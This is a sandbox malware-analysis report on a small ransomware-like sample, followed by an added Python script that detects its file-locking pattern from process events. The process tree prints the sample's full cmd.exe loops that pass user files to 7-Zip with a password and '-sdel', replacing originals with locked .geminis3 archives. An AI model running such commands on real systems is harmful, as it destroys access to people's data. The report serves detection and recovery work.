Analysis
  max time kernel:   107s
  max time network:  74s
  platform:          windows7_x64
  resource:          win7v200410
  submitted:         28/04/2020, 01:36
Static task:     static1
Behavioral task: behavioral1 (sample prueba2.exe, resource win7v200410, 0 signatures, 0 seconds)
Behavioral task: behavioral2 (sample prueba2.exe, resource win10v200410, 0 signatures, 0 seconds)
General
  Target: prueba2.exe
  Size:   329KB
  MD5:    9f5f9c71bb71b8e1571fc4d27721a99e
  SHA1:   e64de07b46d896d25dc059dd774a140f109364c3
  SHA256: be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f
  SHA512: 6c5f031ef96f6fb930bb57c0cc1287f2f34d21475f2710f88341f955405e9cc37143a037939d5cd8387fe80f63ef9ad3ca7b70575d75dcfbca475bda9d941c16
  Score:  1/10
Malware Config
Signatures

Suspicious use of WriteProcessMemory (21 IoCs)
  description                        pid   Process      procid_target
  PID 2040 wrote to memory of 1116   2040  prueba2.exe  26   (logged 3 times)
  PID 2040 wrote to memory of 1004   2040  prueba2.exe  40   (logged 3 times)
  PID 2040 wrote to memory of 1704   2040  prueba2.exe  45   (logged 3 times)
  PID 2040 wrote to memory of 868    2040  prueba2.exe  49   (logged 3 times)
  PID 2040 wrote to memory of 456    2040  prueba2.exe  50   (logged 3 times)
  PID 2040 wrote to memory of 1800   2040  prueba2.exe  51   (logged 3 times)
  PID 2040 wrote to memory of 1768   2040  prueba2.exe  53   (logged 3 times)
  The seven target PIDs are exactly the seven cmd.exe children that prueba2.exe spawns (see Processes), so these writes accompany process creation of its own children rather than injection into an unrelated process.

Suspicious use of AdjustPrivilegeToken (84 IoCs)
  description   pid   Process
  Each of the 21 7z.exe processes (PIDs 316, 1128, 1316, 624, 1336, 1436, 1476, 1520, 1612, 1624, 1656, 1668, 1664, 1688, 792, 328, 1692, 1696, 1708, 1720, 1808) logged the same four entries:
    Token: SeRestorePrivilege
    Token: 35   (privilege LUID 35, SeCreateSymbolicLinkPrivilege)
    Token: SeSecurityPrivilege
    Token: SeSecurityPrivilege
  The identical four entries for every invocation, regardless of the file being archived, point to 7-Zip's own privilege handling at start-up rather than anything the sample adds.

Opens file in notepad (likely ransom note) (1 IoC)
  pid   Process
  1736  NOTEPAD.EXE
Processes

What the tree shows: prueba2.exe (PID 2040) spawns one cmd.exe per user folder (Documents, Pictures, Downloads, Music, Videos, Desktop). Each runs a "for /r" loop over the same mask list and hands every matching file to the locally installed 7-Zip as  a -tzip -mx0 -sdel -p23162 "<file>.geminis3" "<file>" : a store-only (-mx0) zip is written next to the original under an added .geminis3 extension, the original is deleted (-sdel), and the archive is password-protected with the key 23162 passed in clear on the command line. A seventh cmd.exe then opens README.txt in Notepad. The sample carries no cryptography of its own and depends on 7-Zip being present at the hard-coded path C:\PROGRA~1\7-ZIP (C:\Program Files\7-Zip); where it is absent the loop bodies fail and no file is touched. Because the key is visible in every command line, each of the 21 archived files can be restored with  7z x -p23162 "<file>.geminis3" . The masks written without a dot (*docx, *pdf, ...) still match any name ending in those letters, and *mp3 is listed twice. Only the Notepad signature fired, which is why the report scores 1/10 despite 21 user files being replaced: the locking is performed entirely by a legitimate archiver.

[1] C:\Users\Admin\AppData\Local\Temp\prueba2.exe  (PID 2040)
    cmdline:   "C:\Users\Admin\AppData\Local\Temp\prueba2.exe"
    signature: Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\cmd.exe  (PID 1116)
      cmdline: C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"

    [3] C:\PROGRA~1\7-ZIP\7z.exe, one child per file, each run as
        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "<file>.geminis3" "<file>"
        PID   file                                          signature
        316   C:\Users\Admin\Documents\Are.docx             Suspicious use of AdjustPrivilegeToken
        1128  C:\Users\Admin\Documents\Files.docx           Suspicious use of AdjustPrivilegeToken
        1316  C:\Users\Admin\Documents\Opened.docx          Suspicious use of AdjustPrivilegeToken
        624   C:\Users\Admin\Documents\Recently.docx        Suspicious use of AdjustPrivilegeToken
        1336  C:\Users\Admin\Documents\StepMount.docm       Suspicious use of AdjustPrivilegeToken
        1436  C:\Users\Admin\Documents\These.docx           Suspicious use of AdjustPrivilegeToken
        1476  C:\Users\Admin\Documents\UseAssert.docm       Suspicious use of AdjustPrivilegeToken
        1520  C:\Users\Admin\Documents\OutBackup.pdf        Suspicious use of AdjustPrivilegeToken
        1612  C:\Users\Admin\Documents\BlockDebug.xlsm      Suspicious use of AdjustPrivilegeToken
        1624  C:\Users\Admin\Documents\EnterMerge.xls       Suspicious use of AdjustPrivilegeToken
        1656  C:\Users\Admin\Documents\MeasureApprove.xls   Suspicious use of AdjustPrivilegeToken
        1668  C:\Users\Admin\Documents\ConvertToEdit.pptx   Suspicious use of AdjustPrivilegeToken
        1664  C:\Users\Admin\Documents\NewMeasure.pptx      Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\system32\cmd.exe  (PID 1004)
      cmdline: C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Pictures %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"

    [3] C:\PROGRA~1\7-ZIP\7z.exe, one child per file, same command line as above
        PID   file                                          signature
        1688  C:\Users\Admin\Pictures\ConnectComplete.jpg   Suspicious use of AdjustPrivilegeToken
        792   C:\Users\Admin\Pictures\ConvertToSend.jpg     Suspicious use of AdjustPrivilegeToken
        328   C:\Users\Admin\Pictures\Wallpaper.jpg         Suspicious use of AdjustPrivilegeToken
        1692  C:\Users\Admin\Pictures\RegisterNew.png       -

  [2] C:\Windows\system32\cmd.exe  (PID 1704)
      cmdline: C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Downloads %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"

    [3] C:\PROGRA~1\7-ZIP\7z.exe, one child per file, same command line as above
        PID   file                                          signature
        1696  C:\Users\Admin\Downloads\ConvertToFormat.ppt  -
        1708  C:\Users\Admin\Downloads\EnterSync.txt        -
        1720  C:\Users\Admin\Downloads\StopOpen.rar         -

  [2] C:\Windows\system32\cmd.exe  (PID 868)
      cmdline: C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Music %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
      (no matching files; no 7z.exe children)

  [2] C:\Windows\system32\cmd.exe  (PID 456)
      cmdline: C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Videos %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
      (no matching files; no 7z.exe children)

  [2] C:\Windows\system32\cmd.exe  (PID 1800)
      cmdline: C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Desktop %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"

    [3] C:\PROGRA~1\7-ZIP\7z.exe, one child per file, same command line as above
        PID   file                                          signature
        1808  C:\Users\Admin\Desktop\FormatUnlock.7z        -

  [2] C:\Windows\system32\cmd.exe  (PID 1768)
      cmdline: C:\Windows\system32\cmd.exe /c start README.txt

    [3] C:\Windows\system32\NOTEPAD.EXE  (PID 1736)
        cmdline:   "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\README.txt
        signature: Opens file in notepad (likely ransom note)
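The tree above is a detection problem rather than a malware-analysis one: every step is a stock Windows or 7-Zip command line, and the sandbox's signatures did not tie them together. The following Python is an added example for this report, not tria.ge output or code from the sample. It flags an archiver invoked with add + password + -sdel whose archive name is the source name plus a new suffix, flags the cmd.exe "for /r ... -sdel" loop on its own (intent is visible even over an empty folder such as Music), walks each hit up past cmd.exe and 7z.exe to the driving process, and reports the key and extension it harvested from the command lines. The event records are constructed to mirror the tree (PIDs, paths and the key 23162 come from the report; the ppid values 1 and 2 and the benign backup record are placeholders), and the pid/ppid/image/cmdline fields are an assumed schema, not a particular sensor's format.

```python
"""Detect the locking routine in this report's tree: cmd.exe runs
`for /r <folder> ... do 7z a -tzip -mx0 -sdel -p<pw> "<file>.geminis3" "<file>"`,
one 7z.exe process per victim file. Added example, not tria.ge output or code
from the sample; records below are constructed to mirror the tree (pids, paths
and key 23162 are from the report; ppid 1/2 and the benign backup record are
placeholders) and pid/ppid/image/cmdline is an assumed schema."""
import re
from collections import defaultdict

ARCHIVERS = {"7z.exe", "7za.exe", "7zr.exe", "rar.exe", "winrar.exe"}
# cmd.exe for-loop that hands every matching file to an archiver with -sdel
LOOP_RE = re.compile(r"\bfor\s+/r\b.*\bdo\b.*\b(?:7z|7za|7zr|rar)\.exe\b.*-sdel", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_cmdline(cmdline):
    """Tokenise a Windows command line, keeping double-quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def analyse_archiver(cmdline):
    """{password, suffix, source} when an archiver call locks a file in place
    (add + password + -sdel + archive named <source>.<suffix>), else None."""
    toks = split_cmdline(cmdline)
    if len(toks) < 2 or basename(toks[0]) not in ARCHIVERS or toks[1].lower() != "a":
        return None
    switches = [t for t in toks[2:] if t.startswith("-")]
    operands = [t for t in toks[2:] if not t.startswith("-")]
    password = next((s[2:] for s in switches if s[:2].lower() == "-p" and len(s) > 2), None)
    if password is None or "-sdel" not in {s.lower() for s in switches} or len(operands) < 2:
        return None
    archive, source = operands[0], operands[1]
    if not archive.lower().startswith(source.lower() + "."):
        return None  # archive written elsewhere: an ordinary backup, not in-place locking
    return {"password": password, "suffix": archive[len(source):], "source": source}


def attribute(event, by_pid):
    """Walk up past cmd.exe and archiver processes to the process driving them."""
    cur = event
    while cur is not None and basename(cur["image"]) in ARCHIVERS | {"cmd.exe"}:
        cur = by_pid.get(cur["ppid"])
    return cur["pid"] if cur is not None else event["ppid"]


def detect(events, min_files=3):
    """One alert per driver that locks >= min_files files or runs a for/-sdel loop."""
    by_pid = {e["pid"]: e for e in events}
    locked, loops = defaultdict(list), defaultdict(list)
    for e in events:
        finding = analyse_archiver(e["cmdline"])
        if finding:
            locked[attribute(e, by_pid)].append(finding)
        elif LOOP_RE.search(e["cmdline"]):
            loops[attribute(e, by_pid)].append(e["cmdline"])
    alerts = []
    for root in sorted(set(locked) | set(loops)):
        files, cmds = locked.get(root, []), loops.get(root, [])
        if len(files) < min_files and not cmds:
            continue
        passwords = {f["password"] for f in files}
        suffixes = {f["suffix"] for f in files}
        for c in cmds:  # the loop command itself carries the key and the new extension
            passwords.update(re.findall(r"\s-p(\S+)", c))
            suffixes.update(re.findall(r'"%\w+(\.[^"]+)"', c))
        alerts.append({"root_pid": root, "files_locked": len(files), "loops": len(cmds),
                       "root_image": basename(by_pid[root]["image"]) if root in by_pid else None,
                       # passwords double as the recovery key: 7z x -p<pw> "<file><suffix>"
                       "passwords": sorted(passwords), "suffixes": sorted(suffixes)})
    return alerts


# Constructed events shaped like the report's tree (not sensor output).
_7Z, _CMD = r"C:\PROGRA~1\7-ZIP\7z.exe", r"C:\Windows\system32\cmd.exe"


def _lock(pid, ppid, path):
    return {"pid": pid, "ppid": ppid, "image": _7Z, "cmdline":
            f'"C:\\PROGRA~1\\7-ZIP\\7Z.EXE" a -tzip -mx0 -sdel -p23162 "{path}.geminis3" "{path}"'}


def _loop(pid, ppid, folder):
    return {"pid": pid, "ppid": ppid, "image": _CMD, "cmdline":
            _CMD + r" /c for /r %USERPROFILE%" + "\\" + folder + r" %d in (*.jpg *.docx *.pdf) do "
            r'"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"'}


SAMPLE_EVENTS = [
    {"pid": 2040, "ppid": 1, "image": r"C:\Users\Admin\AppData\Local\Temp\prueba2.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\prueba2.exe"'},
    _loop(1116, 2040, "Documents"),
    _lock(316, 1116, r"C:\Users\Admin\Documents\Are.docx"),
    _lock(1128, 1116, r"C:\Users\Admin\Documents\Files.docx"),
    _lock(1316, 1116, r"C:\Users\Admin\Documents\Opened.docx"),
    _loop(1004, 2040, "Pictures"),
    _lock(1688, 1004, r"C:\Users\Admin\Pictures\ConnectComplete.jpg"),
    _loop(868, 2040, "Music"),  # folder empty in the sandbox: loop only, no 7z children
    # benign control (assumed): password-protected backup, no -sdel, archive written elsewhere
    {"pid": 3000, "ppid": 2, "image": r"C:\Program Files\7-Zip\7z.exe", "cmdline":
     r'"C:\Program Files\7-Zip\7z.exe" a -tzip -pBackupKey "D:\backup\docs.zip" "C:\Users\Admin\Documents"'},
]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Run against the constructed events, detect() yields a single alert attributed to prueba2.exe (PID 2040) with four locked files, three loop commands, password 23162 and suffix .geminis3, while the backup invocation produces nothing. The harvested password is also the recovery key: the outputs are ordinary password-protected zip archives, so 7z x -p23162 on each .geminis3 file restores the original. Attributing hits to the nearest non-cmd, non-archiver ancestor is what turns 21 individually unremarkable 7z.exe launches into one verdict on the process that drove them.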